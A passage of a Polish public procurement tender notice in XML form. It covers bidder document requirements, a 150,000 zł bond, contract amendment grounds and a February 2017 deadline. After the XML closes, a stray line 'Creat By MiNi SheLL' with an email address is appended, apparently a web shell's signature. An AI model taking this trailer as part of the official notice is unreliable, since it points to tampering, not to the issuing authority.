3) oświadczenia wykonawcy o  przynależności albo braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 22 ust. 1 pkt. 23 Ustawy.  Wraz ze złożeniem oświadczenia, Wykonawca  może złożyć dokumenty bądź informacje  potwierdzające, że  powiązania z  innym wykonawcą  nie prowadzą do zakłócenia konkurencji w postępowaniu.
W  terminie 3 dni od zamieszczenia przez Zamawiającego na stronie internetowej informacji, o której  mowa w art. 86 ust. 5 Ustawy,  wykonawca składa  oświadczenie o przynależności, albo braku przynależności do tej samej grupy kapitałowej o której mowa w art. 22 ust. 1 pkt 23  Ustawy zgodnie ze wzorem  stanowiącym załącznik nr 5 do SIWZ. 
</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>W celu potwierdzenia spełniania przez wykonawcę warunków udziału 
w postępowaniu żąda: 
1) Oświadczenia wykonawcy składanego na podstawie art. 25a ust. 1 Ustawy dotyczącego spełniania warunków udziału w postępowaniu - wzór oświadczenia stanowi załącznik nr 4 do SIWZ.  Oświadczenie  składane przez Wykonawcę do złożonej oferty.
2) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości,  daty, miejsca  wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane  należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego  i prawidłowo ukończone,  przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeśli z uzasadnionej przyczyny o obiektywnym charakterze  wykonawca nie jest w stanie uzyskać tych dokumentów- inne dokumenty.  Wzór wykazu stanowi  załącznik nr 6 do SIWZ;  
Wykaz  składany  będzie tylko  przez Wykonawcę, którego oferta zostanie oceniona jako najwyżej oceniona.
3) wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - wzór wykazu stanowi załącznik nr 7 do SIWZ;   
Wykaz  składany  będzie tylko  przez Wykonawcę, którego oferta zostanie oceniona jako najwyżej oceniona. 
4)  wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności  odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór wykazu  stanowi załącznik nr 8 do SIWZ.
Wykaz składany będzie tylko przez Wykonawcę, którego oferta zostanie oceniona jako najwyżej oceniona.  
</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>1)  Formularz ofertowy - załącznik nr 1 do SIWZ 
2)  Pełnomocnictwo  do reprezentowania Wykonawcy – jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej); pełnomocnictwo ustanowione do reprezentowania Wykonawców wspólnie ubiegających się 
o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza 
3) dokument(-y), np. zobowiązanie podmiotów, na zasobach których Wykonawca będzie polegał w trybie art. 22 a ustawy Pzp, do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia,  treści których musi wynikać w szczególności:
a)zakres dostępnych Wykonawcy zasobów innego podmiotu,
b)sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia  publicznego.
c) zakres i  okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
d) czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.
</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium>Każdy  Wykonawca  przystępujący do niniejszego przetargu zobowiązany jest do wniesienia wadium przetargowego w wysokości: 150.000,00 zł słownie: sto pięćdziesiąt tysięcy złotych</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>1. Wszelkie  zmiany umowy mogą nastąpić na podstawie uregulowań zawartych  w  art. 144 ust. 1 ustawy  Prawo Zamówień  Publicznych.
2. Zamawiający dopuszcza zmianę postanowień zawartej umowy w  stosunku do treści  oferty na podstawie, której  dokonano wyboru  Wykonawcy  w następujących  przypadkach: 
1) działania siły wyższej, uniemożliwiającej wykonanie umowy w  umówionym  terminie - o okres niezbędny do usunięcia skutków działania siły wyższej.
2) wystąpienia niezależnego od wykonawcy przedłużenia się  terminu  pozyskiwania  uzgodnień oraz warunków  do projektowania od: dysponentów mediów i innych  właściwych  organów i instytucji – Zamawiający ma prawo wydłużyć  termin o najdłuższy okres czasu opóźnienia przez jaki  okoliczności  te wystąpiły,  pomimo dołożenia należytej staranności 
i wystąpienia przez Wykonawcę z odpowiednim wyprzedzeniem,
3) przedłużenia się  pozyskiwania wszelkich uzgodnień i decyzji niezbędnych do otrzymania koniecznych uzgodnień i pozwolenia na budowę trwającego ponad dwa miesiące od daty złożenia poszczególnych opracowań lub dokumentów do uzgodnienia we właściwej instytucji – o okres czasu opóźnienia otrzymania koniecznych uzgodnień i  pozwolenia  na  budowę, kiedy konieczna będzie zmiana terminu  realizacji  zamówienia, Zamawiający  na pisemny  wniosek Wykonawcy  może  wydłużyć  termin  realizacji tego zamówienia,
4) w uzasadnionych  przypadkach, a w szczególności, gdy zajdzie: konieczność dokonania  zmian  w  projekcie  budowlanym, przekroczenia terminów wydawania przez organy administracji: decyzji i zezwoleń  itp., wystąpienia  znalezisk archeologicznych, wyjątkowo  niesprzyjających  warunków  atmosferycznych, geologicznych, hydrologicznych, 
nieprzewidzianych kolizji  z urządzeniami infrastruktury,  wystąpi konieczność  usunięcia niewybuchów  i niewypałów, wykonania  dodatkowych  badań, w  przypadku działania siły wyższej w rozumieniu przepisów Kodeksu Cywilnego;  lub  w innych okolicznościach  niezależnych  od  Zamawiającego  lub Wykonawcy, kiedy konieczna  będzie zmiana  terminu  realizacji zamówienia, Zamawiający na pisemny  wniosek Wykonawcy  może  przedłużyć  termin  realizacji  zamówienia.
5) w innych uzasadnionych przypadkach, gdy  zajdzie konieczność wprowadzenia do  umowy koniecznych zmian wynikających  z  okoliczności, których nie można było przewidzieć w chwili zawarcia umowy a w szczególności zmiany kierownika budowy, zmian kadrowo- personalnych, utraty wymaganych uprawnień, utraty stanowiska z zastrzeżeniem równoważności  uprawnień, Zamawiający  za zgodą lub  na wniosek Wykonawcy może  dokonać  takiej  zmiany. 
6) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, a zmiany te wynikły w trakcie realizacji zamówienia, Zamawiający  za zgodą Wykonawcy może  dokonać  takiej zmiany.
7) w przypadku ustawowej zmiany stawki  podatku od  towarów  i usług ( VAT) cena netto pozostanie bez zmian, a kwota  podatku VAT i  wartość  brutto zostanie odpowiednio  skorygowana zgodnie z aktualnie obowiązującymi przepisami podatkowymi.
8) zmiany Podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, pod warunkiem, że nowy Podwykonawca  wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy Podwykonawca.
9) w przypadku, gdy zajdzie uzasadniona konieczność ograniczenia, lub rezygnacji z  części  umownego zakresu robót, Zamawiający zastrzega sobie możliwość zmniejszenia  wynagrodzenia umownego poprzez korektę wartości ryczałtowej  przedmiotu umowy  po  cenach  i stawkach  wynikających z oferty Wykonawcy,
10) w przypadku, gdy zajdzie uzasadniona konieczność wykonania  robót zamiennych  mających  służyć  właściwej  realizacji zamówienia, Zamawiający zastrzega sobie możliwość zmiany umówionego  wynagrodzenia wynikającego  z porównania  rozmiaru i wartości  robót zamiennych  z robotami  przewidzianymi do realizacji w dokumentacji  projektowej i  zawartej umowie  z zastrzeżeniem nieprzekraczalności ceny ofertowej, która  będzie stanowić maksymalną graniczną  kwotę umówionego wynagrodzenia.  
W  przypadku wystąpienia robót dodatkowych lub uzupełniających  nieobjętych  niniejszym zamówieniem, niezbędnym  do prawidłowego  wykonania umowy,  roboty  te zostaną  rozliczone zostaną w oparciu  o ceny  i  wskaźniki  cenotwórcze zaproponowane przez wykonawcę  w  kosztorysie ofertowym. Zlecenie wykonania robót dodatkowych lub uzupełniających dokonane  zostanie w oparciu o odrębną umowę.  
3. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było w chwili zawarcia umowy, lub dalsze wykonanie umowy  może zagrozić istotnemu interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu, zamawiający może odstąpić od umowy w terminie 30 dni od dnia powzięcia  wiadomości o tych okolicznościach. </zmiana_umowy><kryt_cena></kryt_cena><kryt_0>cena</kryt_0><kryt_0p>60.00</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci>0</ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>15/02/2017</data_skl><godz_skl>09:30</godz_skl><miejsce></miejsce><IV_4_4_jezyki></IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6>Zamawiający ustala kwotę zabezpieczenia należytego wykonania zamówienia 
w wysokości 10 % (słownie: dziesięć procent) ceny ofertowej brutto wybranej oferty.  
</IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci></nr_czesci><nazwa></nazwa><opis></opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c></cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1></kryt_1><kryt_1p></kryt_1p></cz_0></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com